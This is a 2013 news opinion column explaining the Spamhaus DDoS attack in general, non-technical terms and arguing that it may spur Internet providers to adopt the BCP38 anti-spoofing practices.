Home Articles Why Spamhaus Internet attack was good

Why Spamhaus Internet attack was good

By Prasanto K. Roy, IANS,

It’s been a few days since the worst denial-of-service attack in the internet’s three-decade history. A 300-gigabit-per-second torrent of traffic flooded the networks of Spamhaus, and the Internet’s major switches in London, Amsterdam and Frankfurt. It was like a million cars trying to get on to Mumbai’s Sealink at the same time. Some called it the attack that “almost broke the Internet”.

Can the Internet really be brought down by a single group of individuals? Is it that fragile? The short answer to the question is: Yes and No.

Let’s start with the No. The Internet evolved from a network designed to be robust enough to survive multiple nuclear strikes. The Internet adapts to attacks and outages, reroutes traffic, and survives just about anything you throw at it. Fact.

Yet much has changed from that early vision of that robust, adaptive network. In the early Internet, most traffic was text, and it wasn’t sensitive to “latency” – small delays. It didn’t matter if that text was delayed a few moments or even minutes.

Now, a huge chunk of traffic on the Internet is video and audio. A lot of the audio, and some of the video, is in real time. If you’re on a phone call with someone in another country, the call is probably being routed over the Internet, and you need a guarantee of “zero latency” – no delays.

And then there’s a range of critical services on the Internet. Take financial transactions, including stock trades. Automated systems respond in microseconds to bids or market changes. Many traders like to be physically closer to stock exchanges, because they value that one microsecond edge that gives them. Delay a company’s financial transactions by a few seconds, or minutes, and you’re talking about a hit of millions of dollars on your target company.

So, while it is very, very difficult to “break the Internet”, for many of the services running on it today, even slowing it down is life threatening. (Difficult, but not impossible. There are a few physical weak links, mainly around the undersea cables. The interception and arrest of divers trying to cut a critical cable near Egypt suggests a well-funded operation.)

So how did the perpetrators slow down the Internet so severely?

They used a DDoS or “distributed denial of service” attack. They flooded their target organization’s servers with so much traffic that they slowed down to a crawl.

That’s like flooding an organization with so many junk-mail letters that it can’t sort out the real mail. In the process, the “collateral damage” includes the post offices along the way, which slow down badly – affecting every organization those post offices service.

How do you prevent such an attack?

Through a two-pronged approach. One is to trace out the sources and shut them down. To make this difficult, attackers use third-party servers as staging platforms, and further “spoof” Internet addresses to make them difficult to trace and shut down in real time. Cybercrime forces do have means to trace such traffic, but it’s complicated by the lack of real-time collaboration between the cyber-forces of different countries.

The second is the better way out: redesign parts of the Internet to be more robust so that it can ignore or adapt to such an attack.

After a major DDoS attack in 2000 which crippled servers run by Amazon, Yahoo and others, the Internet Society, which includes engineers who invented the Internet, published a “best current practice” (BCP) paper called BCP38, which described ways to beat many types of DDoS attacks.

Unfortunately, these best practices were not implemented by service providers, because they needed individual investment for the greater common good – the security of the Internet. Sort of like people won’t spend money on green homes to save the environment, unless there’s a law demanding they do it.

The Spamhaus attack may become a milestone after which major service providers may be encouraged (or mandated, by governments, and Internet oversight bodies) to implement BCP38 recommendations, and also overall strengthen their networks by adding additional paths, reducing single points of failure. Spamhaus 2013 may, therefore, have been a good thing for the future of the Internet.

(31-03-2013-Prasanto K. Roy (@prasanto on Twitter) is editorial advisor at CyberMedia. The views expressed are personal)